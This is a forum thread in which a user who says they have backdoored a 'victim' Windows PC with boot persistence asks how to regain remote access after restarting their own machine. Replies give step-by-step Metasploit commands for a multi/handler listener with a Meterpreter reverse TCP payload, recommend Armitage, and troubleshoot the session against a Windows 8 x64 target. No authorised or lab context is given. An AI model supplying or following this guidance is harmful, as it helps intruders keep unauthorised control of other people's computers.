Thanks in advance for reading...
Assume that i have installed a backdoor or install a boot persistence in victim windows pc.So i will be able to reconnect even victim restart his pc.But if i restart my pc or close the session then how to establish the session again? I mean want to connect with the victim pc using the backdoor even if i shutdown my pc and open it later.... Is it possible?
14 Responses
Yes. Just recreate your listener in Metasploit. As long as persistence is working, it will connect back when the target computer is turned on.
Thank you very much for your answer... It's really helpful, thanks again...,Are my commands right to recreate my listner?
#./msfconsole -q
#msf > use exploit/multi/handler
#msf exploit(handler) > set payload windows/meterpreter/reversetcp payload => windows/meterpreter/reversetcp
#msf exploit(handler) > set lhost 192.168.1.123 lhost => 192.168.1.123
# msf exploit(handler) > set lport 4444 lport => 4444
#msf exploit(handler) > run
Or i should remove the 3rd(#set payload..) cmd?
Yeah no problem. You got it. Not sure if the payload is needed, though I still put it in.
Another thing to check out if you haven't yet is Armitage. Armitage is a GUI (Graphical user interface) version of Metasploit. Once you get the hang of it, it's a lot easier to use than Metasploit.
If you are running Kali 2.0 do the following to get Armitage up and running.
In a terminal type
msfupdate
apt-get install Armitage
Msfdb init
Then open Armitage. (It should be in the application list in the left)
The bottom half of the program is your Metasploit terminal. The top half will give you a graphic of your target computers with all the options of things to do with it.
I think Armitage comes with Kali already.
It does. I say to do apt-get install Armitage to update it. Maybe it's not necessary, but it's just what I do personally.
Not very good with Aptitude, so I have always just used apt-get update. Would this work, or do the Kali repositories not have it?
Thanks sir,i am very grateful for your help, i will try Armitage. Thanks....
sir when i try above commands it shows error-
Started reverse TCP handler on 192.168.0.110:4444
* Starting the payload handler...
* Sending stage (1188911 bytes) to 192.168.0.108
Sending stage (1188911 bytes) to 192.168.0.108
Sending stage (1188911 bytes) to 192.168.0.108
Sending stage (1188911 bytes) to 192.168.0.108
can you tell me why and any solution?
(Note:I am trying to exploit windows 8 x64 bit.)
Type show options. Copy and paste the results here.
then i have to apply force to stop it....
Your image says the payload is Windows/x64/shell/reversetcp. Did you mean for it to be that? If you meant to do the Meterpreter payload, type set payload windows/meterpreter/reversetcp
Be sure to have the underscore between reverse and tcp, this post edits it out.
Should i always wait online until victim opens payload
If I'm not mistaken, I think Netcat could also be used for this by just listening to the specific port. I may be wrong.
Edit: I think this is just for normal shells, not Meterpreters.
Thanks,i will try again and do as you say sir,thanks for your reply........
Share Your Thoughts